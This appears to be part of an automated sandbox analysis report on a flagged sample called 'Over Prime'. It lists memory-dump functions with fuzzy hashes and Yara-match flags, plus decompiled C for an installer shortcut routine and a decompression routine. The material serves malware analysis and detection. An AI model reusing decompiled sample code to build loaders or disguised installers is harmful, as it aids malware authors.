Instruction ID: 1d14ef354eec5ee464a883dac5fc4c5f6dfcb7ebe96032bbe33d2ec4a8a47967
Opcode Fuzzy Hash: 071136812f46a4aebc47faa119ca303aa46d0affe9aeed4df1704d6ed88e174c
Instruction Fuzzy Hash: AAC1C983E3F31599E7933072C2517E15A81DF27496E118F16CC2AB29A2771F0E8EC9C5

Uniqueness

Uniqueness Score: -1.00%

Function 02C309CF Relevance: 1.7, Strings: 1, Instructions: 463COMMON

Download Yara Rule

Strings

, xrefs: 02C32546

Memory Dump Source

Source File: 00000000.00000002.978964901.0000000002C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c30000_Over Prime.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 0742f7531b23886f3ae6ffe498e7eb56334ff42fa7019e1b1af8ecad1b9e06f8
Instruction ID: dcd17d8124d681f764c6a10505c733228b162dd324192e9bdfe4b04e619f1204
Opcode Fuzzy Hash: 0742f7531b23886f3ae6ffe498e7eb56334ff42fa7019e1b1af8ecad1b9e06f8
Instruction Fuzzy Hash: 62B1A983E2F3159DE7933072C1617E15A91DF274D6E158F1ACC2AB29A2731B0E8EC9C5

Uniqueness

Uniqueness Score: -1.00%

Function 02C308F8 Relevance: 1.7, Strings: 1, Instructions: 459COMMON

Download Yara Rule

Strings

, xrefs: 02C32546

Memory Dump Source

Source File: 00000000.00000002.978964901.0000000002C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c30000_Over Prime.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 91a6d9c06603d8584f7ff7eb99c865bfbb9f460c599c600ac40b797714dfd3f0
Instruction ID: f07b1a82ed4ad5e52aa8977b1077a7371310f435978942dd5a56748ede8382d9
Opcode Fuzzy Hash: 91a6d9c06603d8584f7ff7eb99c865bfbb9f460c599c600ac40b797714dfd3f0
Instruction Fuzzy Hash: 2AC1B983E3B31599E7933072C1527E15A81DF275D6E118F16CC2AB29A2771F0E8E89C5

Uniqueness

Uniqueness Score: -1.00%

Function 02C308B9 Relevance: 1.7, Strings: 1, Instructions: 459COMMON

Download Yara Rule

Strings

, xrefs: 02C32546

Memory Dump Source

Source File: 00000000.00000002.978964901.0000000002C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c30000_Over Prime.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 92ad1dec1414f1580d1f2a0f205fc8bd8201724288aaceb12d98f0bebdcb90d3
Instruction ID: cc1432301c827e0fdd4b136b7d05d11aaa362e6c844f1f44e856551b601eea69
Opcode Fuzzy Hash: 92ad1dec1414f1580d1f2a0f205fc8bd8201724288aaceb12d98f0bebdcb90d3
Instruction Fuzzy Hash: AAC1A983E3B3169DE7933072C1217E15A81DF27596E118F1ADC2AB29A1771F0E8EC9C5

Uniqueness

Uniqueness Score: -1.00%

Function 02C30932 Relevance: 1.7, Strings: 1, Instructions: 456COMMON

Download Yara Rule

Strings

, xrefs: 02C32546

Memory Dump Source

Source File: 00000000.00000002.978964901.0000000002C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c30000_Over Prime.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: e0ff3faf9601edacb5abf6c6a722ec8d7fc04a17db6a120cbb5ff9a37e46d7cf
Instruction ID: 1ffabbb3cb3047b97bb56688fb1a1643db733f9e764bccc6276dec52cf33f545
Opcode Fuzzy Hash: e0ff3faf9601edacb5abf6c6a722ec8d7fc04a17db6a120cbb5ff9a37e46d7cf
Instruction Fuzzy Hash: 99B1A983E3B3159DE7933072C2617E16A81DF27496E158F16CC2A729A2731B0A8EC9D5

Uniqueness

Uniqueness Score: -1.00%

Function 02C30AF1 Relevance: 1.7, Strings: 1, Instructions: 433COMMON

Download Yara Rule

Strings

, xrefs: 02C32546

Memory Dump Source

Source File: 00000000.00000002.978964901.0000000002C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c30000_Over Prime.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 5393d12d5bcaf076db3076117effe5c78ae269ac6f42cc76d2f79f5cc5ad7fda
Instruction ID: 42c1035a0270c2eaf03725a343287258fe9f3fb60cb25518e84fa144df06b15f
Opcode Fuzzy Hash: 5393d12d5bcaf076db3076117effe5c78ae269ac6f42cc76d2f79f5cc5ad7fda
Instruction Fuzzy Hash: 5CB1DA83E2B3059DEB933072C5667E11A81DF134DEE158F1ACC2A72965732B0E8EC8C5

Uniqueness

Uniqueness Score: -1.00%

Function 02C30A80 Relevance: 1.7, Strings: 1, Instructions: 412COMMON

Download Yara Rule

Strings

, xrefs: 02C32546

Memory Dump Source

Source File: 00000000.00000002.978964901.0000000002C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c30000_Over Prime.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 08d6d11a06f3a1aaf7a5be72a1de46bbd2e3bebf27fbc16c969a4d87bbb57b69
Instruction ID: d96555e483fd2d6655b7d2ee43a1e58f4280773abe02cedd37537677e7ae8060
Opcode Fuzzy Hash: 08d6d11a06f3a1aaf7a5be72a1de46bbd2e3bebf27fbc16c969a4d87bbb57b69
Instruction Fuzzy Hash: 1EB1CB83E2F3159DEB933072C1517E15A81DF274D6E158F1ACC2A729A1772B0E8EC9C5

Uniqueness

Uniqueness Score: -1.00%

Function 02C30B32 Relevance: 1.6, Strings: 1, Instructions: 379COMMON

Download Yara Rule

Strings

, xrefs: 02C32546

Memory Dump Source

Source File: 00000000.00000002.978964901.0000000002C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c30000_Over Prime.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID: 0-3916222277
Opcode ID: 3290e52c41116c95c6f78ff801b2446906a15d466f61e90d2a232a826b1dd558
Instruction ID: 275c3c09d4add7d7fb1369bd03ccc77d0db82c33e3215395ecf584d06c402d7e
Opcode Fuzzy Hash: 3290e52c41116c95c6f78ff801b2446906a15d466f61e90d2a232a826b1dd558
Instruction Fuzzy Hash: 73A1DB83E2F3059DDB933072C1617E21A95DF274D6E158F1ACC2AB29A1731B0E8EC8C5

Uniqueness

Uniqueness Score: -1.00%

Function 004021AA Relevance: 1.6, APIs: 1, Instructions: 129
comCOMMON

Download Yara Rule

C-Code - Quality: 67%

			E004021AA(void* __eflags) {
				signed int _t52;
				void* _t56;
				intOrPtr* _t60;
				intOrPtr _t61;
				intOrPtr* _t62;
				intOrPtr* _t64;
				intOrPtr* _t66;
				intOrPtr* _t68;
				intOrPtr* _t70;
				intOrPtr* _t72;
				intOrPtr* _t74;
				intOrPtr* _t76;
				intOrPtr* _t78;
				intOrPtr* _t80;
				void* _t83;
				intOrPtr* _t91;
				signed int _t101;
				signed int _t105;
				void* _t107;

				 *((intOrPtr*)(_t107 - 0x10)) = E00402DA6(0xfffffff0);
				 *((intOrPtr*)(_t107 - 0x44)) = E00402DA6(0xffffffdf);
				 *((intOrPtr*)(_t107 - 8)) = E00402DA6(2);
				 *((intOrPtr*)(_t107 - 0x4c)) = E00402DA6(0xffffffcd);
				 *((intOrPtr*)(_t107 - 0xc)) = E00402DA6(0x45);
				_t52 =  *(_t107 - 0x20);
				 *(_t107 - 0x50) = _t52 & 0x00000fff;
				_t101 = _t52 & 0x00008000;
				_t105 = _t52 >> 0x0000000c & 0x00000007;
				 *(_t107 - 0x40) = _t52 >> 0x00000010 & 0x0000ffff;
				if(E00405E83( *((intOrPtr*)(_t107 - 0x44))) == 0) {
					E00402DA6(0x21);
				}
				_t56 = _t107 + 8;
				__imp__CoCreateInstance(0x4085f0, _t83, 1, 0x4085e0, _t56);
				if(_t56 < _t83) {
					L14:
					 *((intOrPtr*)(_t107 - 4)) = 1;
					_push(0xfffffff0);
				} else {
					_t60 =  *((intOrPtr*)(_t107 + 8));
					_t61 =  *((intOrPtr*)( *_t60))(_t60, 0x408600, _t107 - 0x38);
					 *((intOrPtr*)(_t107 - 0x18)) = _t61;
					if(_t61 >= _t83) {
						_t64 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t64 + 0x50))(_t64,  *((intOrPtr*)(_t107 - 0x44)));
						if(_t101 == _t83) {
							_t80 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t80 + 0x24))(_t80, 0x441000);
						}
						if(_t105 != _t83) {
							_t78 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t78 + 0x3c))(_t78, _t105);
						}
						_t66 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t66 + 0x34))(_t66,  *(_t107 - 0x40));
						_t91 =  *((intOrPtr*)(_t107 - 0x4c));
						if( *_t91 != _t83) {
							_t76 =  *((intOrPtr*)(_t107 + 8));
							 *((intOrPtr*)( *_t76 + 0x44))(_t76, _t91,  *(_t107 - 0x50));
						}
						_t68 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t68 + 0x2c))(_t68,  *((intOrPtr*)(_t107 - 8)));
						_t70 =  *((intOrPtr*)(_t107 + 8));
						 *((intOrPtr*)( *_t70 + 0x1c))(_t70,  *((intOrPtr*)(_t107 - 0xc)));
						if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
							_t74 =  *((intOrPtr*)(_t107 - 0x38));
							 *((intOrPtr*)(_t107 - 0x18)) =  *((intOrPtr*)( *_t74 + 0x18))(_t74,  *((intOrPtr*)(_t107 - 0x10)), 1);
						}
						_t72 =  *((intOrPtr*)(_t107 - 0x38));
						 *((intOrPtr*)( *_t72 + 8))(_t72);
					}
					_t62 =  *((intOrPtr*)(_t107 + 8));
					 *((intOrPtr*)( *_t62 + 8))(_t62);
					if( *((intOrPtr*)(_t107 - 0x18)) >= _t83) {
						_push(0xfffffff4);
					} else {
						goto L14;
					}
				}
				E00401423();
				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t107 - 4));
				return 0;
			}

0x004021b3
0x004021bd
0x004021c7
0x004021d1
0x004021dc
0x004021df
0x004021f9
0x004021fc
0x00402202
0x00402205
0x0040220f
0x00402213
0x00402213
0x00402218
0x00402229
0x00402231
0x004022e8
0x004022e8
0x004022ef
0x00402237
0x00402237
0x00402246
0x0040224a
0x0040224d
0x00402253
0x00402261
0x00402264
0x00402266
0x00402271
0x00402271
0x00402276
0x00402278
0x0040227f
0x0040227f
0x00402282
0x0040228b
0x0040228e
0x00402294
0x00402296
0x004022a0
0x004022a0
0x004022a3
0x004022ac
0x004022af
0x004022b8
0x004022be
0x004022c0
0x004022ce
0x004022ce
0x004022d1
0x004022d7
0x004022d7
0x004022da
0x004022e0
0x004022e6
0x004022fb
0x00000000
0x00000000
0x00000000
0x004022e6
0x004022f1
0x00402c2d
0x00402c39

APIs

CoCreateInstance.OLE32(004085F0,?,00000001,004085E0,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402229

Memory Dump Source

Source File: 00000000.00000002.976796742.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.976768043.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976868656.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.976900335.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977087590.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977116020.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977158326.0000000000440000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977190035.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977231845.000000000045F000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.977277592.0000000000461000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Over Prime.jbxd

Similarity

API ID: CreateInstance
String ID:
API String ID: 542301482-0
Opcode ID: c4fc3fa67b876c583326420a1baafc892d445f4eb77b454d3c92970a980d6818
Instruction ID: 5977cb51530078b600b156af0050786de557c4b464dd586e6a5beaa7a0440451
Opcode Fuzzy Hash: c4fc3fa67b876c583326420a1baafc892d445f4eb77b454d3c92970a980d6818
Instruction Fuzzy Hash: A7411571A00208EFCF40DFE4C989E9D7BB5BF49348B20456AF905EB2D1DB799981CB94

Uniqueness

Uniqueness Score: -1.00%

Function 02C35093 Relevance: 1.6, Strings: 1, Instructions: 347COMMON

Download Yara Rule

Strings

lj|<, xrefs: 02C351F1

Memory Dump Source

Source File: 00000000.00000002.978964901.0000000002C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c30000_Over Prime.jbxd

Yara matches

Similarity

API ID:
String ID: lj|<
API String ID: 0-3104936748
Opcode ID: 970e95be6ef972d8adba88b0ded914af762da004053d4132e88c451a12ef5825
Instruction ID: 639d8b3fc80660037e94bbdb7b68947f276e159551e0cc13fd798c842666e2a5
Opcode Fuzzy Hash: 970e95be6ef972d8adba88b0ded914af762da004053d4132e88c451a12ef5825
Instruction Fuzzy Hash: CEB1CF31A04799DFDB399E78CCA87DB37B2AF55390F99056ECC8687501D7308A85CB42

Uniqueness

Uniqueness Score: -1.00%

Function 02C45323 Relevance: .7, Instructions: 738COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.978964901.0000000002C30000.00000040.00001000.00020000.00000000.sdmp, Offset: 02C30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2c30000_Over Prime.jbxd

Yara matches

Similarity

API ID: LibraryLoadMemoryProtectVirtual
String ID:
API String ID: 3389902171-0
Opcode ID: 04421d2b7886fa811c17e07838728469bc893576ba1707304b5e6520ea9ff646
Instruction ID: f34876624d7319ffc9d858745cfb61e703e2c030c7d9eb6bb5d5667726664148
Opcode Fuzzy Hash: 04421d2b7886fa811c17e07838728469bc893576ba1707304b5e6520ea9ff646
Instruction Fuzzy Hash: 8E528E716083858FDB35CE3889983DB7BE29F573A0F59826ECC998F299D7318542C712

Uniqueness

Uniqueness Score: -1.00%

Function 00406D85 Relevance: .3, Instructions: 334
COMMONCrypto

Download Yara Rule

C-Code - Quality: 79%

			E00406D85(signed int __ebx, signed int* __esi) {
				signed int _t396;
				signed int _t425;
				signed int _t442;
				signed int _t443;
				signed int* _t446;
				void* _t448;

				L0:
				while(1) {
					L0:
					_t446 = __esi;
					_t425 = __ebx;
					if( *(_t448 - 0x34) == 0) {
						break;
					}
					L55:
					__eax =  *(__ebp - 0x38);
					 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
					__ecx = __ebx;
					 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
					 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
					 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
					__ebx = __ebx + 8;
					while(1) {
						L56:
						if(__ebx < 0xe) {
							goto L0;
						}
						L57:
						__eax =  *(__ebp - 0x40);
						__eax =  *(__ebp - 0x40) & 0x00003fff;
						__ecx = __eax;
						__esi[1] = __eax;
						__ecx = __eax & 0x0000001f;
						if(__cl > 0x1d) {
							L9:
							_t443 = _t442 | 0xffffffff;
							 *_t446 = 0x11;
							L10:
							_t446[0x147] =  *(_t448 - 0x40);
							_t446[0x146] = _t425;
							( *(_t448 + 8))[1] =  *(_t448 - 0x34);
							L11:
							 *( *(_t448 + 8)) =  *(_t448 - 0x38);
							_t446[0x26ea] =  *(_t448 - 0x30);
							E004074F4( *(_t448 + 8));
							return _t443;
						}
						L58:
						__eax = __eax & 0x000003e0;
						if(__eax > 0x3a0) {
							goto L9;
						}
						L59:
						 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 0xe;
						__ebx = __ebx - 0xe;
						_t94 =  &(__esi[2]);
						 *_t94 = __esi[2] & 0x00000000;
						 *__esi = 0xc;
						while(1) {
							L60:
							__esi[1] = __esi[1] >> 0xa;
							__eax = (__esi[1] >> 0xa) + 4;
							if(__esi[2] >= (__esi[1] >> 0xa) + 4) {
								goto L68;
							}
							L61:
							while(1) {
								L64:
								if(__ebx >= 3) {
									break;
								}
								L62:
								if( *(__ebp - 0x34) == 0) {
									goto L182;
								}
								L63:
								__eax =  *(__ebp - 0x38);
								 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
								__ecx = __ebx;
								 *( *(__ebp - 0x38)) & 0x000000ff = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
								 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
								 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
								__ebx = __ebx + 8;
							}
							L65:
							__ecx = __esi[2];
							 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000007;
							__ebx = __ebx - 3;
							_t108 = __ecx + 0x4084d4; // 0x121110
							__ecx =  *_t108;
							 *(__ebp - 0x40) =  *(__ebp - 0x40) >> 3;
							 *(__esi + 0xc +  *_t108 * 4) =  *(__ebp - 0x40) & 0x00000007;
							__ecx = __esi[1];
							__esi[2] = __esi[2] + 1;
							__eax = __esi[2];
							__esi[1] >> 0xa = (__esi[1] >> 0xa) + 4;
							if(__esi[2] < (__esi[1] >> 0xa) + 4) {
								goto L64;
							}
							L66:
							while(1) {
								L68:
								if(__esi[2] >= 0x13) {
									break;
								}
								L67:
								_t119 = __esi[2] + 0x4084d4; // 0x4000300
								__eax =  *_t119;
								 *(__esi + 0xc +  *_t119 * 4) =  *(__esi + 0xc +  *_t119 * 4) & 0x00000000;
								_t126 =  &(__esi[2]);
								 *_t126 = __esi[2] + 1;
							}
							L69:
							__ecx = __ebp - 8;
							__edi =  &(__esi[0x143]);
							 &(__esi[0x148]) =  &(__esi[0x144]);
							__eax = 0;
							 *(__ebp - 8) = 0;
							__eax =  &(__esi[3]);
							 *__edi = 7;
							__eax = E0040755C( &(__esi[3]), 0x13, 0x13, 0, 0,  &(__esi[0x144]), __edi,  &(__esi[0x148]), __ebp - 8);
							if(__eax != 0) {
								L72:
								 *__esi = 0x11;
								while(1) {
									L180:
									_t396 =  *_t446;
									if(_t396 > 0xf) {
										break;
									}
									L1:
									switch( *((intOrPtr*)(_t396 * 4 +  &M004074B4))) {
										case 0:
											L101:
											__eax = __esi[4] & 0x000000ff;
											__esi[3] = __esi[4] & 0x000000ff;
											__eax = __esi[5];
											__esi[2] = __esi[5];
											 *__esi = 1;
											goto L102;
										case 1:
											L102:
											__eax = __esi[3];
											while(1) {
												L105:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L103:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L104:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L106:
											__eax =  *(0x40a5c4 + __eax * 2) & 0x0000ffff;
											__eax = __eax &  *(__ebp - 0x40);
											__ecx = __esi[2];
											__eax = __esi[2] + __eax * 4;
											__ecx =  *(__eax + 1) & 0x000000ff;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
											__ecx =  *__eax & 0x000000ff;
											__eflags = __ecx;
											if(__ecx != 0) {
												L108:
												__eflags = __cl & 0x00000010;
												if((__cl & 0x00000010) == 0) {
													L110:
													__eflags = __cl & 0x00000040;
													if((__cl & 0x00000040) == 0) {
														goto L125;
													}
													L111:
													__eflags = __cl & 0x00000020;
													if((__cl & 0x00000020) == 0) {
														goto L9;
													}
													L112:
													 *__esi = 7;
													goto L180;
												}
												L109:
												__esi[2] = __ecx;
												__esi[1] = __eax;
												 *__esi = 2;
												goto L180;
											}
											L107:
											__esi[2] = __eax;
											 *__esi = 6;
											goto L180;
										case 2:
											L113:
											__eax = __esi[2];
											while(1) {
												L116:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L114:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L115:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L117:
											 *(0x40a5c4 + __eax * 2) & 0x0000ffff =  *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
											__esi[1] = __esi[1] + ( *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
											__ecx = __eax;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - __eax;
											__eflags = __ebx;
											__eax = __esi[4] & 0x000000ff;
											__esi[3] = __esi[4] & 0x000000ff;
											__eax = __esi[6];
											__esi[2] = __esi[6];
											 *__esi = 3;
											goto L118;
										case 3:
											L118:
											__eax = __esi[3];
											while(1) {
												L121:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L119:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L120:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L122:
											__eax =  *(0x40a5c4 + __eax * 2) & 0x0000ffff;
											__eax = __eax &  *(__ebp - 0x40);
											__ecx = __esi[2];
											__eax = __esi[2] + __eax * 4;
											__ecx =  *(__eax + 1) & 0x000000ff;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - ( *(__eax + 1) & 0x000000ff);
											__ecx =  *__eax & 0x000000ff;
											__eflags = __cl & 0x00000010;
											if((__cl & 0x00000010) == 0) {
												L124:
												__eflags = __cl & 0x00000040;
												if((__cl & 0x00000040) != 0) {
													goto L9;
												}
												L125:
												__esi[3] = __ecx;
												__ecx =  *(__eax + 2) & 0x0000ffff;
												__esi[2] = __eax;
												goto L180;
											}
											L123:
											__esi[2] = __ecx;
											__esi[3] = __eax;
											 *__esi = 4;
											goto L180;
										case 4:
											L126:
											__eax = __esi[2];
											while(1) {
												L129:
												__eflags = __ebx - __eax;
												if(__ebx >= __eax) {
													break;
												}
												L127:
												__eflags =  *(__ebp - 0x34);
												if( *(__ebp - 0x34) == 0) {
													goto L182;
												}
												L128:
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) =  *(__ebp - 0x34) - 1;
												__edx =  *( *(__ebp - 0x38)) & 0x000000ff;
												__ecx = __ebx;
												__edx = ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x40) =  *(__ebp - 0x40) | ( *( *(__ebp - 0x38)) & 0x000000ff) << __cl;
												 *(__ebp - 0x38) =  *(__ebp - 0x38) + 1;
												__ebx = __ebx + 8;
												__eflags = __ebx;
											}
											L130:
											 *(0x40a5c4 + __eax * 2) & 0x0000ffff =  *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40);
											__esi[3] = __esi[3] + ( *(0x40a5c4 + __eax * 2) & 0x0000ffff &  *(__ebp - 0x40));
											__ecx = __eax;
											 *(__ebp - 0x40) =  *(__ebp - 0x40) >> __cl;
											__ebx = __ebx - __eax;
											__eflags = __ebx;
											 *__esi = 5;
											goto L131;
										case 5:
											L131:
											__eax =  *(__ebp - 0x30);
											__edx = __esi[3];
											__eax = __eax - __esi;
											__ecx = __eax - __esi - 0x1ba0;
											__eflags = __eax - __esi - 0x1ba0 - __edx;
											if(__eax - __esi - 0x1ba0 >= __edx) {
												__ecx = __eax;
												__ecx = __eax - __edx;
												__eflags = __ecx;
											} else {
												__esi[0x26e8] = __esi[0x26e8] - __edx;
												__ecx = __esi[0x26e8] - __edx - __esi;
												__ecx = __esi[0x26e8] - __edx - __esi + __eax - 0x1ba0;
											}
											__eflags = __esi[1];
											 *(__ebp - 0x20) = __ecx;
											if(__esi[1] != 0) {
												L135:
												__edi =  *(__ebp - 0x2c);
												do {
													L136:
													__eflags = __edi;
													if(__edi != 0) {
														goto L152;
													}
													L137:
													__edi = __esi[0x26e8];
													__eflags = __eax - __edi;
													if(__eax != __edi) {
														L143:
														__esi[0x26ea] = __eax;
														__eax = E004074F4( *((intOrPtr*)(__ebp + 8)));
														__eax = __esi[0x26ea];
														__ecx = __esi[0x26e9];
														__eflags = __eax - __ecx;
														 *(__ebp - 0x30) = __eax;
														if(__eax >= __ecx) {
															__edi = __esi[0x26e8];
															__edi = __esi[0x26e8] - __eax;
															__eflags = __edi;
														} else {
															__ecx = __ecx - __eax;
															__edi = __ecx - __eax - 1;
														}
														__edx = __esi[0x26e8];
														__eflags = __eax - __edx;
														 *(__ebp - 8) = __edx;
														if(__eax == __edx) {
															__edx =  &(__esi[0x6e8]);
															__eflags = __ecx - __edx;
															if(__ecx != __edx) {
																__eax = __edx;
																__eflags = __eax - __ecx;
																 *(__ebp - 0x30) = __eax;
																if(__eax >= __ecx) {
																	__edi =  *(__ebp - 8);
																	__edi =  *(__ebp - 8) - __eax;
																	__eflags = __edi;
																} else {
																	__ecx = __ecx - __eax;
																	__edi = __ecx;
																}
															}
														}
														__eflags = __edi;
														if(__edi == 0) {
															goto L183;
														} else {
															goto L152;
														}
													}
													L138:
													__ecx = __esi[0x26e9];
													__edx =  &(__esi[0x6e8]);
													__eflags = __ecx - __edx;
													if(__ecx == __edx) {
														goto L143;
													}
													L139:
													__eax = __edx;
													__eflags = __eax - __ecx;
													if(__eax >= __ecx) {
														__edi = __edi - __eax;
														__eflags = __edi;
													} else {
														__ecx = __ecx - __eax;
														__edi = __ecx;
													}
													__eflags = __edi;
													if(__edi == 0) {
														goto L143;
													}
													L152:
													__ecx =  *(__ebp - 0x20);
													 *__eax =  *__ecx;
													__eax = __eax + 1;
													__ecx = __ecx + 1;
													__edi = __edi - 1;
													__eflags = __ecx - __esi[0x26e8];
													 *(__ebp - 0x30) = __eax;
													 *(__ebp - 0x20) = __ecx;
													 *(__ebp - 0x2c) = __edi;
													if(__ecx == __esi[0x26e8]) {
														__ecx =  &(__esi[0x6e8]);
														 *(__ebp - 0x20) =  &(__esi[0x6e8]);
													}
													_t357 =  &(__esi[1]);
													 *_t357 = __esi[1] - 1;
													__eflags =  *_t357;
												} while ( *_t357 != 0);
											}
											goto L23;
										case 6:
											L156:
											__eax =  *(__ebp - 0x2c);
											__edi =  *(__ebp - 0x30);
											__eflags = __eax;
											if(__eax != 0) {
												L172:
												__cl = __esi[2];
												 *__edi = __cl;
												__edi = __edi + 1;
												__eax = __eax - 1;
												 *(__ebp - 0x30) = __edi;
												 *(__ebp - 0x2c) = __eax;
												goto L23;
											}
											L157:
											__ecx = __esi[0x26e8];
											__eflags = __edi - __ecx;
											if(__edi != __ecx) {
												L163:
												__esi[0x26ea] = __edi;
												__eax = E004074F4( *((intOrPtr*)(__ebp + 8)));
												__edi = __esi[0x26ea];
												__ecx = __esi[0x26e9];
												__eflags = __edi - __ecx;
												 *(__ebp - 0x30) = __edi;
												if(__edi >= __ecx) {
													__eax = __esi[0x26e8];
													__eax = __esi[0x26e8] - __edi;
													__eflags = __eax;
												} else {
													__ecx = __ecx - __edi;
													__eax = __ecx - __edi - 1;
												}
												__edx = __esi[0x26e8];
												__eflags = __edi - __edx;
												 *(__ebp - 8) = __edx;
												if(__edi == __edx) {
													__edx =  &(__esi[0x6e8]);
													__eflags = __ecx - __edx;
													if(__ecx != __edx) {
														__edi = __edx;
														__eflags = __edi - __ecx;
														 *(__ebp - 0x30) = __edi;
